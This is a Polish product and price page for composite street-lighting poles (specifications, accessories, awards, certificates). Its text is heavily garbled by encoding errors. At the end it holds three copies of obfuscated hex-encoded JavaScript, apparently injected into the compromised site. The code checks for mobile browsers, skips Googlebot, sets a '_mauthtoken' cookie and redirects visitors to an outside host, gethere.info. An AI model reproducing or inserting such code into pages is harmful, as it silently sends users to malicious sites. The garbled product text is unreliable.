Słupy oświetleniowe

Słupy kompozytowe

SAi??up Ai??amany

zalety kompozytu

Kompozyt to materiaAi?? zbudowany z co najmniej dwóch róA?nych skAi??adników poAi??Ai??czonych w celu uzyskania nowego „lepszego” materiaAi??u. DoskonaAi??ym przykAi??adem tego typu synergii jest pAi??yta kartonowo-gipsowa, gdzie Ai??Ai??czAi??c dwa na pozór kruche materiaAi??y: gips i papier, uzyskano produkt o duA?ych parametrach wytrzymaAi??oAi??ciowych. Kompozyt polimerowy to poAi??Ai??czenie A?ywic poliestrowych, tkanin szklanych oraz mat szklanych w celu uzyskania materiaAi??u o wysokich parametrach wytrzymaAi??oAi??ciowych, odpowiedniego do produkcji sAi??upów oAi??wietleniowych.

Schemat kompozytu

 
OszczAi??dnoAi??ci

 

TANI MONTAAi??

LEKKI PRODUKT – TANI TRANSPORT

NIEPOTRZEBNY CIA?Ai??KI SPRZA?T MONTAAi??OWY

TANIE SPOSOBY OSADZANIA SA?UPÓW

II KL. OCHRONNOAsCI – BRAK KOSZTÓW BEDNARKI

 

 

BRAK KOSZTÓW EKSPLOATACJI

SA?UP NIE KORODUJE

NIE ZMIENIA KOLORU

NIEPOTRZEBNA KONSERWACJA FARBAi??

NIE STANOWI WARTOAsCI ZA?OMOWEJ

BRAK OKRESOWYCH BADAA? NA IZOLACYJNOAsAi?? SA?UPÓW

 

 

PRODUKCJA – NISKA EMISJA CO2

OdziaAi??ywanie CO2 przy produkcji i eksploatacji sAi??upa kompozytowego:

Produkcja sAi??upów kompozytowych jest przyjazna Ai??rodowisku, gdyA? emisja CO2 jest bardzo niska, a sAi??up kompozytowy poddaje siAi?? 100% przetworzeniu. Kompozyt jest najkorzystniejszym surowcem ze wzglAi??du na swoje parametry, wAi??aAi??ciwoAi??ci, moA?liwoAi??ci recyklingu i emisjAi?? CO2 do atmosfery. Kompozyty przewyA?szajAi?? przyjaznoAi??Ai?? Ai??rodowiska w stosunku do innych materiaAi??ów w ciAi??gu ich „A?ycia” ze wzglAi??du na dAi??ugi okres eksploatacji, brak koniecznoAi??ci obsAi??ugi w trakcie eksploatacji, niA?sza energochAi??onnoAi??Ai?? przy ich przetwarzaniu, Ai??atwy i nisko energochAi??onny proces recyklingu. Produkcja i wytwarzanie kompozytów czAi??sto zuA?ywa mniej energii niA? produkcja metali dlatego, A?e kompozyty waA?Ai?? mniej, iloAi??Ai?? energii zuA?yta podczas transportu jest takA?e mniejsza.

Kolorystyka

Kolory sAi??upów w ofercie standardowej to RAL 7032, RAL 7042, RAL 6005, RAL 7021. KaA?demu sAi??upowi moA?na nadaAi?? dowolnAi?? barwAi??, w kolorach zbliA?onych do palety RAL. Istnieje moA?liwoAi??Ai?? produkcji sAi??upów wielokolorowych. Barwienie sAi??upa na inny kolor z palety RAL za dopAi??atAi??.

 
Estetyka

UA?ycie najwyA?szej jakoAi??ci materiaAi??ów powoduje, A?e sAi??up jest odporny na promienie UV.

GAi??adka powierzchnia uAi??atwia usuwanie zabrudzeAi??, nawet pozostaAi??oAi??ci po kleju i taAi??mach, uA?ywanych do wieszania plakatów
i ogAi??oszeAi??. SAi??up moA?na szybko i skutecznie oczyAi??ciAi?? stosujAi??c Ai??rodki czyszczAi??ce firmy Alumast. Dodatkowo powierzchnia sAi??upa moA?e byAi?? pokryta powAi??okami silikonowymi wykonanymi w nanotechnologii, które jeszcze bardziej zabezpieczajAi?? sAi??up przed zabrudzeniami i klejem.

 
TrwaAi??oAi??Ai??

Kompozyt poliestrowo-szklany nie ulega korozji.

SAi??up kompozytowy wkopywany nie zawiera elementów metalowych, które mogAi??yby skorodowaAi??- dziAi??ki temu jest odporny na:

- sól drogowAi?? i inne Ai??rodki uA?ywane do odAi??nieA?ania i czyszczenia ulic,

- zanieczyszczenia powstaAi??e w ruchu ulicznym,

- zanieczyszczenia pochodzAi??ce od zwierzAi??t

 

Kompozytowe drzwiczki rewizyjne nie majAi?? wartoAi??ci w skupie zAi??omu. Eliminuje to w znacznym stopniu moA?liwoAi??Ai?? kradzieA?y oraz znacznie ogranicza iloAi??Ai?? dewastacji, dekompletacji i zwiAi??zanych z tym napraw. Kompletny sAi??up kompozytowy ogranicza dostAi??p do zAi??Ai??cza osobom niepowoAi??anym.

OdpornoAi??Ai?? na niekorzystne czynniki zewnAi??trzne

 
BezpieczeAi??stwo

Kompozyt poliestrowo-szklany jest materiaAi??em izolacyjnym. SAi??up kompozytowy wkopywany nie zawiera elementów metalowych, które wymagaAi??yby uziemienia.

Nie ma moA?liwoAi??ci wykonania poAi??Ai??czenia galwanicznego pomiAi??dzy sAi??upem kompozytowym wkopywanym a przewodami czynnymi instalacji, elementami ochrony przepiAi??ciowej lub ochrony przeciwporaA?eniowej. Nawet podczas uszkodzenia izolacji przewodów, zawilgocenia lub dewastacji na powierzchni sAi??upa kompozytowego wkopywanego nie pojawi siAi?? napiAi??cie niebezpieczne.

 

SAi??up kompozytowy tylko w nieznacznym stopniu pochAi??ania energiAi?? podczas kolizji – pojazd po zderzeniu kontynuuje jazdAi?? ze zmniejszonAi?? prAi??dkoAi??ciAi??.

Jak wykazaAi??y przeprowadzone badania wartoAi??Ai?? krytycznego dla bezpieczeAi??stwa wskaA?nika ASI (wskaA?nik intensywnoAi??ci przyspieszenia – zgodnie z normAi?? PN-EN 1317) jest piAi??ciokrotnie niA?sza niA? wartoAi??Ai??, przy której skutki zderzenia sAi?? niebezpieczne lub Ai??miertelne dla osób znajdujAi??cych siAi?? w pojeA?dzie. Wielowarstwowa konstrukcja kompozytowa doskonale tAi??umi drgania powstajAi??ce w ruchu ulicznym oraz pochodzAi??ce od trakcji tramwajowej i kolejowej. WpAi??ywa to na przedAi??uA?enie A?ywotnoAi??ci lamp wyAi??adowczych i ukAi??adów zapAi??onowych stosowanych w oprawach ulicznych.

 
MontaA? i logistyka

Uniwersalna tuleja aluminiowa fi 60, montowana w górnej czAi??Ai??ci sAi??upa, pozwala na montaA? typowych opraw ulicznych z uchwytem do montaA?u pionowego. Zastosowanie wysiAi??gnika lub uchwytu regulowanego pozwala na montaA? typowych opraw ulicznych
z uchwytem do montaA?u bocznego. DziAi??ki wiAi??kszej Ai??rednicy wewnAi??trznej- nawet o 60% prace instalacyjne wewnAi??trz sAi??upów kompozytowych- moA?na wykonaAi?? szybciej i dokAi??adniej. Pozwala to na póA?niejszAi?? bezproblemowAi?? eksploatacjAi??.

Zastosowanie lekkiego sAi??upa kompozytowego wkopywanego pozwala na rezygnacjAi?? z ciAi??A?kiego fundamentu betonowego. UAi??atwia to transport, montaA? i demontaA? (w przypadku kolizji), który moA?e wykonaAi?? dwóch monterów, bez uA?ycia maszyn i w znacznie krótszym czasie. ObniA?a to znaczAi??co koszty inwestycji i eksploatacji.

SAi??up kompozytowy wkopywany o wysokoAi??ci 9m waA?y tylko 39kg

 

NIAi??SZE KOSZTY INSTALACJI SA?UPA WKOPYWANEGO – brak podstawy i fundamentu

SZYBSZA INSTALACJA – 9-metrowy sAi??up wkopywany waA?y tylko 39 kg

NIAi??SZE KOSZTY TRANSPORTU I MONTAAi??U – sAi??up nie wymaga ciAi??A?kiego fundamentu

UA?ATWIENIE PONOWNEGO MONTAAi??U SA?UPA – w sytuacji koniecznoAi??ci jego wymiany np. w przypadku uszkodzenia sAi??upa podczas kolizji drogowej lub modernizacji caAi??ego oAi??wietlenia ulicznego.

opis produktu

SAi??up oAi??wietleniowy z kompozytów z mechanizmem zawiasowym

SAi??up Ai??amany

SAi??up kompozytowy z mechanizmem zawiasowym to idealne rozwiAi??zanie w przypadku sAi??upów montowanych na terenach trudno dostAi??pnych dla pojazdów ze zwyA?kAi?? (trakty kolejowe, stoki narciarskie, wAi??skie drogi itp.). Mechanizm uAi??atwia montaA? i demontaA? oprawy oraz wymianAi?? A?ródAi??a Ai??wiatAi??a. Sam mechanizm umoA?liwiajAi??cy poAi??oA?enie sAi??upa usytuowany jest u jego podstawy.

 

MECHANIZM ZAWIASOWY UMOAi??LIWIA POA?OAi??ENIE SA?UPA W CELU MONTAAi??U LUB DEMONTAAi??U OPRAWY

SZEROKI WYBÓR KOLORÓW

A?ATWY MONTAAi?? I DEMONTAAi??

WYSOKIE BEZPIECZEA?STWO BIERNE

dane techniczne

SA?UPY Z CZA?AsCIAi?? WKOPYWANAi?? W GRUNT

SAi??upy z czAi??Ai??ciAi?? wkopywanAi?? w grunt

Symbol sAi??upa H [m] BD [mm] TD [mm] CP [mm] LPH [m] GH [m]
SKPW-A? 4,0/ 175/60/5,5 4,0 175 60 130 5,0 1,0
SKPW-A? 5,0/ 175/60/5,5 5,0 175 60 130 6,0 1,0
SKPW-A? 6,0/ 175/60/5,5 6,0 175 60 130 7,0 1,0
SKPW-A? 7,0/ 193/60/6,0 7,0 193 60 130 8,2 1,2
SKPW-A? 8,0/ 193/60/6,0 8,0 193 60 130 9,2 1,2
SKPW-A? 9,0/ 193/60/6,0 9,0 193 60 130 10,5 1,5
oznaczenia wystAi??pujAi??ce na schemacie i w tabeli

H [m] – wysokoAi??Ai?? sAi??upa

BD [mm] – Ai??rednica dolnej czAi??Ai??ci sAi??upa

TD [mm] – Ai??rednica wierzchoAi??ka

 

CP [mm] – czAi??Ai??Ai?? cylindryczna wierzchoAi??ka

LPH [m] – wysokoAi??Ai?? sAi??upa wraz z czAi??Ai??ciAi?? wkopywanAi??

GH [m] – dAi??ugoAi??Ai?? czAi??Ai??ci wkopywanej w grunt

 

 

 

 

 

 

 

 

SA?UPY Z PODSTAWAi?? DO MONTAAi??U NA FUNDAMENCIE

Symbol sAi??upa H [m] BD [mm] TD [mm] CP [mm] BPT [mm] BPHD [mm]
SKPF-A? 4,0/ 175/60/5,5 4,0 175 60 130 8 200
SKPF-A? 5,0/ 175/60/5,5 5,0 175 60 130 8 200
SKPF-A? 6,0/ 175/60/5,5 6,0 175 60 130 8 200
SKPF-A? 7,0/ 193/60/6,0 7,0 193 60 130 8 300
SKPF-A? 8,0/ 193/60/6,0 8,0 193 60 130 8 300
SKPF-A? 9,0/ 193/60/6,0 9,0 193 60 130 8 300
oznaczenia wystAi??pujAi??ce na schemacie i w tabeli

H [m] – wysokoAi??Ai?? sAi??upa

BD [mm] – Ai??rednica dolnej czAi??Ai??ci sAi??upa

TD [mm] – Ai??rednica wierzchoAi??ka

 

CP [mm] – czAi??Ai??Ai?? cylindryczna wierzchoAi??ka

BPT [m] – gruboAi??Ai?? podstawy

BPHD [m] – rozstaw miAi??dzy otworami podstawy

 

 

 

 

 

akcesoria

WysiAi??gniki aluminiowe

Symbol produktu BL [mm] ID [mm] BU [mm] Cena [PLN]
WJ1/60/5/1000 1000 60 249 190
WJ1/60/5/1500 1500 60 293 209
Symbol produktu BL [mm] ID [mm] BU [mm] Cena [PLN]
WJ2/60/5/500 500 60 1000 219
WJ2/60/5/1000 1000 60 1000 229
WJ2/60/5/1500 1500 60 1000 248
Symbol produktu BL [mm] ID [mm] BU [mm] Cena [PLN]
WJ3/60/5/500 500 60 500 195
WJ3/60/5/1000 1000 60 500 213
WJ3/60/5/1500 1500 60 500 230
 

 

Symbol produktu BL [mm] ID [mm] BU [mm] Cena [PLN]
WD1/60/5/1000 1000 60 249 239
WD1/60/5/1500 1500 60 293 277
Symbol produktu BL [mm] ID [mm] BU [mm] Cena [PLN]
WD2/60/5/500 500 60 1000 290
WD2/60/5/1000 1000 60 1000 327
WD2/60/5/1500 1500 60 1000 365
Symbol produktu BL [mm] ID [mm] BU [mm] Cena [PLN]
WD3/60/5/500 500 60 500 242
WD3/60/5/1000 1000 60 500 281
WD3/60/5/1500 1500 60 500 318
 

 

oznaczenia wystAi??pujAi??ce na schematach i w tabelach

BL [mm] – dAi??ugoAi??Ai?? wysiAi??gnika

ID [mm] – Ai??rednica osadzenia na sAi??upie

BU [mm] – podwyA?szenie punktu Ai??wietlnego

 

Prefabrykowane fundamenty betonowe

 

Symbol produktu Cena [PLN]
F100/30 159
F120/43 223
 

 

ZAi??Ai??cza sAi??upowe pojedyAi??cze


 

Symbol produktu Cena [PLN]
IZK-4-01 34
IZK-4-02 16
IZK-4-03 14
 

 

Zestawy zAi??Ai??cz sAi??upowych

ZESTAWY ZA?Ai??CZ SA?UPOWYCH ELEMENTY SKA?ADOWE ZESTAWU
(SYMBOL ZA?Ai??CZA – ILOAsAi?? ZA?Ai??CZY
Cena [PLN]
ZAi??Ai??cze na jednAi?? oprawAi??
(wysiAi??gnik pojedynczy lub brak wysiAi??gnika)
IZK-4-01 – 1szt; IZK-4-02 – 2szt; IZK-4-03 – 1szt 79
ZAi??Ai??cze na jednAi?? oprawAi??
(wysiAi??gnik podwójny)
IZK-4-01 – 1szt; IZK-4-02 – 2szt; IZK-4-03 – 1szt 97
 

 

Redukcje Ai??rednicy sAi??upa


 

Symbol produktu Cena [PLN]
R60/48 44
 

 

Drzwiczki rewizyjne

akcesoria_drzwiczki

Produkt Cena [PLN]
Drzwiczki wykonane z kompozytów w kolorze i w wymiarach dostosowanych do posiadanych sAi??upów. Produkt kompletny, przygotowany do instalacji na sAi??upie. 102
 
 

 

PAi??yn do czyszczenia

PAi??yn do czyszczenia masztA?w kompozytowych

Produkt Cena [PLN]
Easy cleaner – Asrodek do czyszczenia sAi??upów oAi??wietleniowych i masztów flagowych z naklejek, taAi??m klejAi??cych, ogAi??oszeAi?? reklamowych. 50
 

 

 

 

 

Wszystkie ceny netto. Nie zawierajAi?? podatku VAT.

certyfikaty, nagrody

Nagrody (produkty kompozytowe)

2015

Nagrody (produkty kompozytowe)

 
 medal_expopower_2015

 

 

 

 

ZAi??oty medal za A?erdA? kompozytowAi?? podczas MiAi??dzynarodowych Targów Energetycznych EXPOPOWER 2015 dla SpóAi??ki zaleA?nej ENERGY COMPOSITES Sp. z o.o.

 
sl_swietlny

 

 

 

 

WyróA?nienie w konkursie na najlepszy wyrób targów za sAi??up Ai??wietlny z nadrukiem podczas XXIII MiAi??dzynarodowych Targów SprzAi??tu OAi??wietleniowego AswiatAi??o 2015.

 
 lumipole

 

 

 

 

WyrA?A?nienie w konkursie na najbardziej innowacyjny wyrA?b targA?w za kompozytowy sAi??up oAi??wietleniowy LUMIPOLE podczas XXIII MiAi??dzynarodowych TargA?w SprzAi??tu OAi??wietleniowego AswiatAi??o 2015.

 
2012
ENERGETAB 2010

 

 

 

WyróA?nienie w konkursie o puchar prezesa polsko-biaAi??oruskiej izby handlowo-przemysAi??owej dla firmy prezentujAi??cej najefektywniejsze ekonomiczne rozwiAi??zania technologiczno-organizacyjne w zakresie energetyki, na Lubelskich Targach Energetycznych ENERGETICS.

 

 

 

ENERGETAB 2010

 

 

 

 

Srebrny medal na miAi??dzynarodowych targach wynalazczoAi??ci, badaAi?? naukowych i nowych technik "BRUSSELS INNOVA" 2012 za sAi??up Ai??wietlny z odbAi??yAi??nikiem wykonany z kompozytów polimerowo-szklanych.

Brussels Innove

 

 

 

 

Rosyjski komitet organizacyjny targów "BRUSSELS INNOVA" 2012 nagrodziAi?? ALUMAST za aktywnAi?? promocjAi??
postAi??pu naukowo-mechanicznego i wysokie osiAi??gniAi??cia na 61-ej wystawie wynalazków, badaAi?? naukowych i nowych technologii w Brukseli 2012

 
2011

Lampa autonomiczna z rekomendacjAi?? Dobry Wzór 2011 DecyzjAi?? jury konkursu Dobry Wzór 2011 organizowanego przez Instytut Wzornictwa PrzemysAi??owego w Warszawie lampa autonomiczna – autorski produkt firmy Alumast S.A. – nie zostaAi??a niestety zakwalifikowana do finaAi??u tego konkursu. DuA?ym sukcesem jest jednak sam fakt zakwalifikowania produktu do grona uczestników konkursu – proces kwalifikacji trwaAi?? kilka miesiAi??cy i objAi??Ai?? kilkaset nowych produktów z caAi??ej Polski.

WiAi??cej na stronie Instytutu Wzornictwa PrzemysAi??owego: http://www.iwp.com.pl/1670

 
ENERGETAB 2011

 

 

 

 

 

 

Lampa autonomiczna z oprawAi?? Ledal, produkt wykonany z kompozytów polimerowych, otrzymaAi??a Srebrny Medla PGE-Energia Odnawialna podczas targów ENERGETAB 2011 w Bielsku BiaAi??ej.

ENERGETICS 2011

 

 

 

 

 

 

Grupa produktów opartych na budowie sAi??upa kompozytowego z polimerów otrzymaAi??a WyróA?nienie w kategorii Produkt Roku podczas targów ENERGETICS 2011 w Lublinie.

 
2010
ENERGETAB 2010

 

 

 

 

 

SAi??up kompozytowy z powierzchniAi?? powlekanAi?? refleksyjnymi mikrokulkami szklanymi oraz z wbudowanAi?? taAi??mAi?? LED, z przeznaczeniem na bezpieczne przejAi??cia dla pieszych, otrzymaAi?? brAi??zowy medal na targach ENERGETAB 2010 w Bielsku-BiaAi??ej.

INFRASTRUKTURA

 

 

 

 

 

Grupa produktów: sAi??up kompozytowy, sAi??up kompozytowy z mechanizmem do jego poAi??oA?enia (Ai??amania), sAi??up kompozytowy z mikrokulkami szklanymi oraz sAi??up kompozytowy wielobarwny, otrzymaAi??a I nagrodAi?? Ministra Infrastruktury w kategorii "WyposaA?enie dróg i obiektów uA?ytecznoAi??ci publicznej" podczas targów INFRASTRUKTURA 2010 w Warszawie.

 
2008
ENERGETAB 2008

 

 

 

 

 

Produkt uzyskaAi?? wyróA?nienie niezaleA?nej komisji na targach Energetycznych ENERGETAB 2008 w Bielsku BiaAi??ej.

 

 

 

 

 

 

 

 

 

 

 

Certyfikaty (produkty kompozytowe)

Wojskowe Centrum Normalizacji, JakoAi??ci i Kodyfikacji nadaAi??o Firmie Natowski Kod Podmiotu Gospodarki Narodowej.

 

Certyfikat ZgodnoAi??ci (CE)

 

Produkt uzyskaAi?? Certyfikat ZgodnoAi??ci z normAi?? PN-EN 60529,

PN-EN 62262 oraz PN-EN 50102;

stopieAi?? ochrony przed penetracjAi?? czynników zewnAi??trznych IP44,

stopieAi?? ochrony przed zewnAi??trznymi uderzeniami mechanicznymi IK10.

 

Produkcja sAi??upów oAi??wietleniowych odbywa siAi?? w oparciu o normy systemu zarzAi??dzania jakoAi??ciAi?? ISO.

Produkt uzyskaAi?? Certyfikat ZgodnoAi??ci (CE) z normAi?? europejskAi?? PN-EN 40-7:2004

Certyfikat ZgodnoAi??ci (CE)Certyfikat ZgodnoAi??ci 2010

 

 

 

Produkt uzyskaAi?? pozytywnAi?? opiniAi?? Instytutu Kolejnictwa w Warszawie

 

 

PKP Polskie linie kolejowe

pkp

 

 

 

PKP Polskie linie kolejowe

PKP Energetyka

 

 

cenniki

Cennik

Cennik cz1

PobierzDrukuj

 

Wszystkie ceny netto. Nie zawierajAi?? podatku VAT.
Cena dotyczy sAi??upa kompozytowego Ai??amanego w jednym z trzech kolorów: RAL 7032, RAL 7035 lub RAL 6005 (pozostaAi??e kolory za dopAi??atAi??).
Cena nie zawiera fundamentów, wysiAi??gników, lamp oraz innych akcesoriów – wiAi??cej informacji w cenniku do pobrania

do pobrania

Karta katalogowa

DrukujPobierz

 

 

 

 

 

 

 

 

 

 

 

 

 


var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 